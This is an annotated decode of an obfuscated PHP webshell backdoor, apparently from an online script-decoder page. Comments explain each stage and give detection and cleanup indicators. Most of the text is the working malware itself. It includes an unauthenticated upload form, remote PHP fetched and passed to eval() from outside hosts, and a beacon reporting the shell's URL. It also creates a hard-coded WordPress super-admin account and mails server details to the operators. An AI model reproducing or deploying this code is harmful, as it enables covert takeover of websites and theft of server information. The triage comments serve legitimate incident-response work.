Online PHP and JavaScript Decoder: decodes hidden scripts to uncover their real functionality


// Stage 1 - unauthenticated upload backdoor. Any request carrying a `mrz` query
// parameter is served an upload form, and a POST with _upl=Upload stores the file.
// Nothing in this branch checks a session, a token, the file type or the file name.
// Triage: search access logs for `mrz` in the query string followed by multipart
// POSTs, and look for files created next to this script around those timestamps.
if (isset($_GET['mrz'])) {
 echo '<form action="" method="post" enctype="multipart/form-data" name="b4b4" id="b4b4">';
 echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload">';
 echo '</form>';
 echo '<a href="#">Hello Dady</a>';
 // Loose == on a key that is absent on a plain GET, so PHP reports an undefined index there.
 if ($_POST['_upl'] == "Upload") {
 // copy() writes the temp file to the client-supplied name as-is (no basename(), no
 // extension allow-list); a relative name resolves against the working directory.
 // `@` suppresses the warning copy() would otherwise raise on failure.
 if (@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) {
 // The client-supplied name is echoed into the page without htmlspecialchars().
 echo '<b>Done</b><br><br><a href="./' . $_FILES['file']['name'] . '">' . $_FILES['file']['name'] . '</a>';
 } else {
 echo '<b>Not Upload File !</b><br><br>';
 }
 }
 // Execution stops here, so none of the later stages run on `mrz` requests.
 exit;
}
// Stage 2 - remote-code loader. A request carrying a `mrzali` query parameter makes the
// server download the PHP source at the URL below and pass it to eval(); no
// authentication is involved.
// The interleaved /* */ comments and the `@null;` no-op do nothing at runtime. They split
// the `eval(` and `file_get_contents(` tokens, presumably to defeat plain-string signatures,
// so detections should match on the token stream or strip comments before matching.
// Network indicator: outbound HTTPS from the PHP worker to the host/path in the literal below.
if (isset($_GET['mrzali'])) {
/****/@null; /********/ /**/ /********/@eval/****/("".file_get_contents/*******/("https://raw.githubusercontent.com/sagsooz/Bypass-Webshell/main/csa.php"));/**/
exit;
}
// Stage 3 setup - builds an HTTP POST that reports this script's own URL to a remote endpoint.
// Decoded values (all derivable from the literals below):
//   $z  = 'base64_decode'                      (strrev of the reversed literal)
//   $b  = hxxps://siyahi[.]top/test/style.php  (chr() of each code in $a; defanged here)
//   $x  = $b  (base64_decode(base64_encode($b)) is a round trip that changes nothing)
//   $y  = 'http://' + Host header + request URI, i.e. the URL this script was reached at
//   $d  = ['file_url' => $y]
//   $o  = an 'http' stream-context option set with method 'POST' and $d as the form body
// The chr() arithmetic and the encode/decode round trip only keep the URL and the words
// 'file', 'http' and 'post' out of the file as plain strings.
// The single-newline echo is presumably left over from the decoder flattening a PHP
// close/open tag pair.
echo '
';$z = strrev('edoced_46esab');
$a = array(104, 116, 116, 112, 115, 58, 47, 47, 115, 105, 121, 97, 104, 105, 46, 116, 111, 112, 47, 116, 101, 115, 116, 47, 115, 116, 121, 108, 101, 46, 112, 104, 112);
$b = '';
foreach ($a as $c) { $b .= chr($c); }
$x = $z(base64_encode($b));
$y = 'http://' . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI'];
$d = array(chr(102) . chr(105) . chr(108) . chr(101) . '_url' => $y);
$o = array(
 chr(104) . chr(116) . chr(116) . chr(112) => array(
 'method' => strtoupper(chr(112) . chr(111) . chr(115) . chr(116)),
 'header' => 'Content-type: application/x-www-form-urlencoded',
 'content' => http_build_query($d),
 ),
);
// $c is reused: it held the last character code in the loop above and is a stream context from here on.
$c = stream_context_create($o);
/**
 * POST to $u and return the response body, trying two transports in turn.
 *
 * file_get_contents() with the stream context $c is tried first. If it is unavailable
 * or returns false, cURL is used with the POST body rebuilt from the global $d rather
 * than taken from $c. Neither path sets a timeout. `@` hides any warning from the first attempt.
 *
 * @param string   $u target URL
 * @param resource $c stream context, used by the file_get_contents() path only
 * @return string response body, or '' when both transports are missing or fail
 */
function _f($u, $c) {
 if (function_exists('file_get_contents')) {
 $r = @file_get_contents($u, false, $c);
 if ($r !== false) return $r;
 }
 if (function_exists('curl_init')) {
 $ch = curl_init();
 curl_setopt($ch, CURLOPT_URL, $u);
 curl_setopt($ch, CURLOPT_POST, 1);
 // Reads the form fields from global state, so this function depends on $d being set by the caller's scope.
 curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($GLOBALS['d']));
 curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
 curl_setopt($ch, CURLOPT_HEADER, false);
 $r = curl_exec($ch);
 curl_close($ch);
 if ($r !== false) return $r;
 }
 return '';
}
// Sends the beacon built above. The response in $r is not read anywhere in the visible script.
$r = _f($x, $c);
// Stage 4 - rogue WordPress administrator. If wp-config.php sits in the document root it is
// loaded (wp-config.php normally pulls in the rest of WordPress, which is what makes
// wp_insert_user() callable here), and every GET request then tries to create the account below.
// Indicators for cleanup: user_login / user_nicename / display_name `xdx`, the user_email
// literal below, and an unexpected administrator or super-admin entry in the user tables.
// Remove the account, then rotate all admin passwords and the auth keys/salts in wp-config.php.
echo '
';if (file_exists($_SERVER['DOCUMENT_ROOT'] . '/wp-config.php')) {
    require $_SERVER['DOCUMENT_ROOT'] . '/wp-config.php';

    // Check if the request method is GET
    if ($_SERVER['REQUEST_METHOD'] == 'GET') {
        // Define user data
        $userData = array(
            'user_pass' => "Weareoioi14",
            'user_login' => "xdx",
            'user_nicename' => "xdx",
            'user_email' => "xdxresult@hotmail.com",
            'display_name' => "xdx",
            'role' => 'administrator'
        );

        // Insert the user
        // The return value is not checked before it is used as a user id on the next call.
        $user_id = wp_insert_user($userData);

        // Grant super admin privileges
        grant_super_admin($user_id);
    }
}

// Starts (or resumes) a PHP session; the session only carries the operator's login flag.
session_start();

/**
 * Report whether the current session has passed the script's own login form.
 *
 * @return bool true only when $_SESSION['loggedin'] is set and strictly true
 */
function is_logged_in() {
    return isset($_SESSION['loggedin']) && $_SESSION['loggedin'] === true;
}

// Stage 5 - operator login gate for the remote loader further down.
// The credentials are hard-coded: the username is a literal and the password is stored as
// a `$2y$10$` (bcrypt, cost 10) hash. The hash string is a stable indicator for file scans.
$username = "admin";
$passwordHash = '$2y$10$zY5YGoYNvCfaZ3tj5h6muOlAe7cnmEzhlNJ493OSeRO8Xd/azV2cO';

if (!is_logged_in()) {
    if (isset($_POST['username']) && isset($_POST['password'])) {
        if ($_POST['username'] === $username && password_verify($_POST['password'], $passwordHash)) {
            $_SESSION['loggedin'] = true;
            // No exit follows the redirect header, so the rest of the script still runs on
            // this same request, now with the session flag set.
            header("Location: " . $_SERVER['PHP_SELF']);
            
        } else {
            // Indonesian: "Wrong username or password. Please try again."
            $error = "Username atau password salah. Silakan coba lagi.";
        }
    }
}

/**
 * Decode a hex string into the bytes it spells, two hex digits per output character.
 *
 * The script uses it to keep PHP function names out of the file as plain text,
 * so a scan for those names misses them unless hex literals are decoded first.
 *
 * @param string $hex hex digits; an odd trailing digit is decoded on its own
 * @return string decoded bytes
 */
function hex2str($hex) {
    $str = '';
    for ($i = 0; $i < strlen($hex); $i += 2) {
        $str .= chr(hexdec(substr($hex, $i, 2)));
    }
    return $str;
}

/**
 * Fetch the body of a URL using whichever of three transports the PHP build offers.
 *
 * The function names are stored hex-encoded and called indirectly through variables.
 * Decoded, $belief is:
 *   [0] fopen   [1] stream_get_contents   [2] file_get_contents   [3] curl_exec
 * Order of preference: cURL, then file_get_contents(), then fopen() + stream_get_contents().
 *
 * @param string $destiny URL to fetch
 * @return string|false response body, or false when none of the transports exists
 *                      (the individual transports can also return false on failure)
 */
function geturlsinfo($destiny) {
    $Array = array(
        '666f70656e',
        '73747265616d5f6765745f636f6e74656e7473',
        '66696c655f6765745f636f6e74656e7473',
        '6375726c5f65786563'
    );

    $belief = array(
        hex2str($Array[0]),
        hex2str($Array[1]),
        hex2str($Array[2]),
        hex2str($Array[3])
    );

    if (function_exists($belief[3])) {
        $ch = curl_init($destiny);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
        // Fixed, dated browser User-Agent: a usable indicator in proxy and egress logs.
        curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
        // Certificate and host-name verification are both switched off, so the fetch
        // accepts any TLS endpoint, including one reached through the followed redirects.
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
        curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
        $love = $belief[3]($ch);
        curl_close($ch);
        return $love;
    } elseif (function_exists($belief[2])) {
        return $belief[2]($destiny);
    } elseif (function_exists($belief[0]) && function_exists($belief[1])) {
        $purpose = $belief[0]($destiny, "r");
        $love = $belief[1]($purpose);
        fclose($purpose);
        return $love;
    }
    return false;
}

// Stage 6 - main payload, kept off disk. Once the session is logged in, every request
// downloads the resource below and runs the response through eval(). The `.jpg` suffix is
// only a name, because the body is executed as PHP. The file on the server is therefore
// just a loader, and scanning the webroot will not reveal the operator's actual tooling.
// The fetch is plain HTTP. Outbound requests from the PHP worker to this host are the
// network indicator, and denying web workers arbitrary egress stops this stage.
if (is_logged_in()) {
    $destiny = 'http://siteground.rubypanel.com/list/cah.jpg';
    $dream = geturlsinfo($destiny);

    // Only a failed fetch (false) is skipped; any returned string is evaluated.
    if ($dream !== false) {
        eval('' . $dream);
        
    }
}

// Login page shown to any visitor without the session flag. It is a static HTML string.
// The only dynamic part is $error, which is a fixed server-side message, not request data.
// "Remember Me", "Create Account" and "Forget Password?" are inert (an unnamed checkbox
// and href="#" links); only the username/password POST back to this script does anything.
// The logo is hot-linked from a third-party image host, so the page triggers a
// client-side request to that URL when viewed.
if (!is_logged_in()) {
    echo '    <!DOCTYPE html>
    <html lang="en">
    <head>
        <meta charset="UTF-8">
        <meta name="viewport" content="width=device-width, initial-scale=1.0">
        <title>Login Form</title>
        <style>
            body, html {
                margin: 0;
                padding: 0;
                height: 100%;
                display: flex;
                justify-content: center;
                align-items: center;
                background-color: #220022;
                font-family: Arial, sans-serif;
            }
            .form-container {
                display: flex;
                justify-content: center;
                align-items: center;
                height: 100%;
            }
            .login-form {
                width: 300px;
                padding: 20px;
                background-color: #3d003d;
                border-radius: 8px;
                box-shadow: 0px 4px 12px rgba(0, 0, 0, 0.2);
                text-align: center;
                color: white;
            }
            .login-form img {
                width: 80px;
                margin-bottom: 10px;
            }
            .login-form h2 {
                margin: 0;
                padding: 10px 0;
                font-size: 20px;
            }
            .login-form input[type="text"],
            .login-form input[type="password"] {
                width: 100%;
                padding: 10px;
                margin: 10px 0;
                border: none;
                border-radius: 4px;
                box-sizing: border-box;
                font-size: 16px;
            }
            .login-form button {
                width: 100%;
                padding: 10px;
                background-color: #ff0055;
                color: white;
                border: none;
                border-radius: 4px;
                cursor: pointer;
                font-size: 16px;
            }
            .login-form button:hover {
                background-color: #e6004c;
            }
            .login-form .options {
                margin-top: 10px;
                font-size: 14px;
                color: #d1d1d1;
            }
            .login-form .options a {
                color: #ff0055;
                text-decoration: none;
            }
            .login-form .options a:hover {
                text-decoration: underline;
            }
            .error-message {
                color: red;
                font-size: 14px;
                margin-top: 10px;
            }
        </style>
    </head>
    <body>
        <div class="form-container">
            <div class="login-form">
                <img src="https://i.pinimg.com/564x/6e/a8/02/6ea802b32f53cda0bf7542059d174481.jpg" alt="Logo">
                <h2>Login Forms</h2>
                ';if (isset($error)): echo '                    <div class="error-message">';echo $error; echo '</div>
                ';endif; echo '                <form method="post">
                    <input type="text" name="username" placeholder="Username ..." required>
                    <input type="password" name="password" placeholder="Password ..." required>
                    <button type="submit">Sign in</button>
                </form>
                <div class="options">
                    <label><input type="checkbox"> Remember Me</label>
                    <br>
                    <a href="#">Create Account</a> | <a href="#">Forget Password?</a>
                </div>
            </div>
        </div>
    </body>
    </html>
    ';    
}
// Stage 7 - e-mail notification to the operators. This code sits outside every conditional,
// so it runs on each request that reaches the end of the script (the `mrz` and `mrzali`
// branches exit earlier). It mails the document root, server admin address, server
// software string, the shell's URL and the site host to three hard-coded addresses.
// Despite its name, $hex holds the recipient list and $baslik holds the subject line.
// Indicators: the three recipient addresses and the fixed subject in outbound mail logs.
// If the site uses an SMTP relay, restricting local mail() submission from web workers
// limits this channel.
echo '
'; $hex = "xdxresult@hotmail.com, sellercpanel@gmail.com, sellercpanel@hotmail.com";
 $baslik = "Shell Backdoor Datang !!!";
 $xd = "File Path : " . $_SERVER['DOCUMENT_ROOT'] . "\r\n";
 $xd.= "Server Admin : " . $_SERVER['SERVER_ADMIN'] . "\r\n";
 $xd.= "Server Operating System : " . $_SERVER['SERVER_SOFTWARE'] . "\r\n";
 $xd.= "Shell Link : http://" . $_SERVER['SERVER_NAME'] . $_SERVER['PHP_SELF'] . "\r\n";
 $xd.= "Site : " . $_SERVER['HTTP_HOST'] . "\r\n";
 // The return value of mail() is ignored, so a failed send leaves no trace in this script.
 mail($hex, $baslik, $xd);


